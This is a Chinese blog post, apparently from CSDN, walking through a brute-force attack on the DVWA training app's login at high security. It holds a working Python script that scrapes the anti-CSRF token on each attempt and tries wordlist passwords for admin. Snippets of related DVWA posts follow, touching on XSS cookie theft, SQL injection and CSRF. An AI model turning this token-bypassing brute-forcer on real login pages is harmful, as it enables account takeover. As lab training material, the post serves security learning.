DVWA 1.10版本Brute Force(high)

最新推荐文章于 2025-06-17 10:53:36 发布
原创 最新推荐文章于 2025-06-17 10:53:36 发布 · 822 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍使用BurpSuite进行不同安全级别下的暴力破解过程,包括low和mid级别的直接破解及high级别中如何通过获取token并结合用户密码完成身份验证的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

low和mid等级直接使用burpsuite暴力破解,high等级先抓包发现有token认证机制,需要先获取token,然后用token加上用户密码验证身份。

以下为python暴力破解代码

import re
import requests


url='http://127.0.0.1:8000/vulnerabilities/brute/'
header={'Host': '127.0.0.1:8000',
	'Upgrade-Insecure-Requests': '1',
	'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36',
	'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
	'Referer': 'http://127.0.0.1:8000/vulnerabilities/brute/',
	'Accept-Encoding': 'gzip, deflate',
	'Accept-Language': 'zh-CN,zh;q=0.9',
	'Cookie': 'csrftoken=ZFWiZJoWLGvU2CzqD2HSwGBzK79Fqrr8tDrSQAi2I3NIEpGxCcEq4IXsxxX6rzy3; PHPSESSID=t9bisbu48jq5b9cllf5ge5u8f6; security=high'}
txt=open('zd.txt')
line=txt.readline()
while line:
	password=line.strip()
	res=requests.get(url,headers=header)
	a=''
	a=res.content
	m="'user_token' value='(.*?)'"
	n=re.findall(r"'user_token' value='(.*?)'",a)
	if n:
		user_token=n[0]
	new_url=url+'?username=admin&password='+password+'&user_token='+user_token+'&Login=Login'
	res=requests.get(new_url,headers=header)
	if 'Username and/or password incorrect.' in res.content:
		print('Password %s is incorrect' %password)
	else:
		print('Password %s is correct' %password)
		break
	line = txt.readline()


                

        

    

    
  



    

      

        

            

              
                
                  monsterdouble
                
              
            

            

                关注
              
            

        

        

          
      

      










                



	

		

			

				
					
DVWA——high等级Brute Force通关

				
			

			

				

					weixin_51220765的博客
				

				

					12-23
					
					435
					
				

			

		

		

			
				
DVWA——high等级Brute Force通关
登录dvwa,选择high模式进行练习

来到Brute Force,首先输入username,password进行测试,查看输出情况


打开BP进行拦包,把拦到的包发送到Intruder模块,设置两个爆破参数(1、密码参数 2、token值参数)选择第三种爆破模式Pitchfork

这时我们清除默认被标记的,然后给我想要获取的信息添加标记

选择Pichfork(草叉模式)因为它是多参数同时爆破,但用的是不同的字典


在Payload Sets里的

			
		

	



                

            
              



	

		

			

				
					
DVWA靶场-Brute Force暴力破解

				
			

			

				

					mlws1900的博客
				

				

					03-12
					
					2041
					
				

			

		

		

			
				
具体来说,它使用了mysqli_real_escape_string()函数对用户输入的用户名进行转义,确保特殊字符在SQL语句中不会被误解为SQL语句的一部分,从而保护数据库安全。进入暴力破解的界面,有点基础的都知道,在bp中通过字典,导入用户名和密码进行爆破,这样的操作大家见多了,再写没啥意思,想看的可以去pikachu靶场的暴力破解去了解具体操作,本文主要结合代码进行分析。3.high-高等安全等级,有安全措施保护,是中等安全等级的加深,这个等级下的安全漏洞可能不允许相同程度的攻击。

			
		

	



              


  
              

                


	

		

			

				
					
DVWA-v1.10-文件包含

				
			

			

				

					-
				

				

					03-20
					
					4712
					
				

			

		

		

			
				
DVWA v1.10搭建在linux系统上。
进来之后看到

可以看到三个文件fil1.php、file2.php、file3.php
同时还给出三个链接:


			
		

	





	

		

			

				
					
DVWA下载、安装教程

					
最新发布

				
			

			

				

					Gappsong874的博客
				

				

					06-17
					
					771
					
				

			

		

		

			
				
XAMPP(Windows/macOS/Linux)、WAMP(Windows)或MAMP(macOS)一键安装Apache、PHP和MySQL。,使用默认凭证登录即可进入靶场界面。左侧菜单包含SQL注入、XSS等漏洞演练模块。点击“Code”按钮选择“Download ZIP”即可获取最新版本压缩包。,点击“Create/Reset Database”按钮自动创建数据表。DVWA需要PHP 5.3-7.4,若报错需调整。中启用该选项并重启服务。完成上述步骤后,访问。

			
		

	



		

			
		



	

		

			

				
					
DVWA1.10】SQL Injection通关笔记

				
			

			

				

					EC_Carrot的博客
				

				

					12-31
					
					493
					
				

			

		

		

			
				
等级Security Level: lowSecurity Level: mediumSecurity Level: highSecurity Level: impossible
Security Level: low
<?php 

if( isset( $_REQUEST[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_REQUEST[ 'id' ]; 

    // Check database 
    $query  = "SELECT f

			
		

	





	

		

			

				
					
DVWA1.10-BruteForce

				
			

			

				

					uh_eng的博客
				

				

					07-20
					
					208
					
				

			

		

		

			
				
low
URL:http://localhost/DVWA/vulnerabilities/brute/?username=admin&password=password&Login=Login
直接构造GET请求来进行暴力破解,这里使用Python编写脚本,使用弱密码字典进行暴力破解:
import requests
import re

url1 = "http://localhost/DVWA/vulnerabilities/brute/?username=admin&pass

			
		

	





	

		

			

				
					
DVWA1.10-XSS

				
			

			

				

					uh_eng的博客
				

				

					07-26
					
					277
					
				

			

		

		

			
				
反射型
low
在输入框里填入的内容会通过GET请求的方式发往后端,同时后端会根据输入的内容拼接一个页面,把输入的内容显示给用户。
在输入框里输入<script>alert('xss');</script>点击提交会发现弹出弹窗。验证了漏洞存在。不过xss可不是用来给访问者弹窗的,接下来继续利用该漏洞窃取访问者的cookie。
首先编写一段xss脚本放在攻击者服务器上,其作用是读取当前的cookie和host信息,并提交到攻击者的服务器上。
//文件名为xss_cookie.js
v

			
		

	





	

		

			

				
					
DVWA靶场-Brute Force暴力破解~保姆级教程!!!

				
			

			

				

					2301_77360738的博客
				

				

					05-09
					
					6554
					
				

			

		

		

			
				
DVWA靶场初体验,超简单的暴力破解!!!

			
		

	





	

		

			

				
					
DVWA靶场-BruteForce·low~教程

				
			

			

				

					m0_63936639的博客
				

				

					05-24
					
					621
					
				

			

		

		

			
				
brute force名为蛮力,此时此刻,我们的任务就是将这个页面可以成功的login in,当然我们现在并不知道正确的username以及password...

			
		

	





	

		

			

				
					
dvwa学习-brute force(暴力破解)

				
			

			

				

					qq_17762247的博客
				

				

					05-09
					
					2067
					
				

			

		

		

			
				
一、简介:
Brute-Force(暴力破解),又称为穷举攻击,是一种密码分析的方法,即将密码进行逐个推算直到找出真正的密码为止。例如:一个已知是四位数并且全部由阿拉伯数字组成的密码,其可能共有10000种组合,因此最多尝试9999次就能找到正确的密码。理论上除了具有完善保密性的密码以外,利用这种方法可以破解任何一种密码,问题只在于如何缩短试误时间。有些人运用计算机来增加效率,有些人透过字典攻击来...

			
		

	





	

		

			

				
					
DVWABrute Force通关(低中高)

				
			

			

				

					LIU6636LIU的博客
				

				

					07-12
					
					1596
					
				

			

		

		

			
				
DVWABrute Force通关(低中高)

			
		

	





	

		

			

				
					
Dvwa最新版本2022可用,下载到phpstudy,www目录下就可使用

				
			

			

				

					06-28
				

			

		

		

			
				
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞的web应用,旨在为专业的安全人员提供一个合法的环境,来测试他们的工具和技能。帮助web开发人员理解web应用保护的过程,还可以在课堂中为师生的安全性教学提供便利。
DVWA是一个RandomStorm开源项目,
DVWA项目开始于2008年12月,并逐渐受到欢迎。 现在,全世界有成千上万的安全专业人员,学生和教师正在使用它。 DVWA现在已包含在流行的渗透测试Linux发行版中,例如Samurai的Web测试框架等。
【许可】DVWA是一个免费软件,在遵守自由软件基金会发布的GNU通用公共许可的前提下,你可以重新发布它和/或修改它。许可可以是版本3,或(由您选择)任何更高的版本DVWA的发行是希望它能够有用,但没有提供担保,甚至没有对适销性和特殊用途适用性做暗示性的担保,更多详细信息可参见GNU通用公共许可证。

			
		

	





	

		

			

				
					
DVWA最新版

				
			

			

				

					03-23
				

			

		

		

			
				
DVWA最新版DVWA最新版DVWA最新版DVWA最新版DVWA最新版DVWA最新版

			
		

	





	

		

			

				
					
DVWA全级别教程

				
			

			

				

					10-26
				

			

		

		

			
				
DVWA全级别教程 通关秘籍 练手的同学可以下载 epub文件 适合手机平板看

			
		

	





	

		

			

				
					
DVWA1.0.7汉化版源码.zip

				
			

			

				

					11-02
				

			

		

		

			
				
安信华Web弱点演示系统基于知名WEB弱点测试系统DVWA1.0.7,

由独自等待汉化,ay暗影提供软件封装,

可能部分汉化不理想,大家可以给我反馈。

安信华web弱点演示系统基于DVWA1.0.7汉化而来,相对于原版本修改如下功能:

1、全界面汉化,包括介绍及相应的说明,更适合国内使用。

2、新增加不安全的验证码测试模块。

3、新增webservice代码执行。

4、增加每个项目的测试方法(低安全级别)。

5、修正不安全验证中密码更改失效问题。

6、解决原版中文乱码问题。

7、增加了暴力破解视频

8、修改命令执行代码中的错误,原版基于linux测试,汉化版则是在windows下面测试。

			
		

	





	

		

			

				
					
DVWA1.10-SQL注入

				
			

			

				

					uh_eng的博客
				

				

					07-16
					
					440
					
				

			

		

		

			
				
low
字符型注入
select first_name,last_name from users where user_id='1'与select user_id from users where user_id='1asdfasdf'查询结果一致。
猜测原因应该是由于表中的user_id字段类型为int,所以在与字符串类型比较时会进行转换,与PHP类似,在转换过程中碰到非数字字符时转换终止,这就导致了上面的查询中where后面的效果相同。
获取MySQL数据库信息
如果注入类型为字符型,需要解决末尾的’闭

			
		

	





	

		

			

				
					
将CCP协议移植到TC275中(1

				
			

			

				

					qq_34309267的博客
				

				

					12-08
					
					1821
					
				

			

		

		

			
				
如上图所示,这是CCP的协议栈,包含头文件及源代码。
include里边包含所有与CCP相关的头文件。
1.Ccp_CAN_Driver.h
此文件主要包括和can驱动相关的宏定义,枚举,结构体及调用函数。
void MultiCAN_CCP_Init(void);
void MultiCAN_Messgage_send_CAN(uint8 data[],IfxMultican_Can_MsgObj canSrcMsgObj,uint32 id);
void MultiCAN_Messgage_read_.

			
		

	





	

		

			

				
					
dvwa v1.10取消登陆/屏蔽菜单/更改默认安全等级

				
			

			

				

					ghboyone的博客
				

				

					05-31
					
					626
					
				

			

		

		

			
				
dvwa\includes\dvwaPage.inc.php文件中,将函数dvwaPageStartup改成如下:






			
		

	





	

		

			

				
					
DVWA1.10_CSRF

				
			

			

				

					whime
				

				

					07-11
					
					407
					
				

			

		

		

			
				
LOW

服务器收到提交的新密码和确认密码之后,比较是否相同,相同则修改密码,没有任何防护机制。此处可以简单构造带有参数的链接诱导用户点击:
http://192.168.29.128/DVWA-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#
但是点击之后会出现修改成功页面,用户很容易发现密码已经被修改了。

攻击者还可以诱导用户访问特定页面,将链接隐藏在标签中.

			
		

	





	

		

			

				
					
dvwa汉化

				
			

			

				

					04-03
				

			

		

		

			
				
### 关于 DVWA汉化版本及其下载

DVWA (Damn Vulnerable Web Application) 是一款用于安全测试的学习工具,其目标是提供一个易受攻击的应用程序环境供用户学习和实验。对于希望使用中文界面或教程的用户来说,可以参考以下资源:

#### 汉化版本下载
存在一个完全汉化的 DVWA 版本,名为 **DVWA-Chinese**[^1]。该项目已经将原始英文版本进行了全面翻译,并提供了完整的功能支持。可以通过访问项目的托管地址来获取该版本:
- 项目地址: [https://gitcode.com/gh_mirrors/dv/DVWA-Chinese](https://gitcode.com/gh_mirrors/dv/DVWA-Chinese)[^1]

此外,还有另一个可能的资源可供选择,它同样包含了详细的配置说明以及汉化后的文件包:
- 参考链接: [https://gitcode.com/Resource-Bundle-Collection/79295](https://gitcode.com/Resource-Bundle-Collection/79295)[^5]

#### 安装指南
为了成功运行 DVWA(无论是原版还是汉化版),需要具备一定的 PHP 和数据库环境支持。以下是推荐的一种简单方式——通过 phpStudy 工具完成安装过程。

- **phpStudy**: 这是一个集成开发环境,能够快速部署 LAMP/WAMP 平台所需的全部组件。
  - 下载地址: [https://www.xp.cn/][^2]
  
按照官方文档或者社区分享的经验贴操作即可顺利完成设置流程[^4]。需要注意的是,在实际执行过程中可能会遇到诸如 `low.php` 文件被杀毒软件误判等问题;对此只需暂时关闭防护机制再重新尝试加载页面即可恢复正常工作状态。

#### 学习资料建议
如果正在寻找关于如何利用 DVWA 开展具体任务指导的信息,则可查阅如下几篇博文作为入门参考资料之一:

- 文章标题:“DVWA教程实践之Brute Force”,作者记录了个人经历过的挑战环节解析心得[^3];
- “Win10下最新版DVWA搭建全过程详解”则针对Windows操作系统给出了更为详尽的操作指引。

以上内容均能帮助初学者更好地理解并掌握整个平台的功能特性。

```bash
# 示例命令:克隆仓库至本地目录
git clone https://gitcode.com/gh_mirrors/dv/DVWA-Chinese.git
```

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值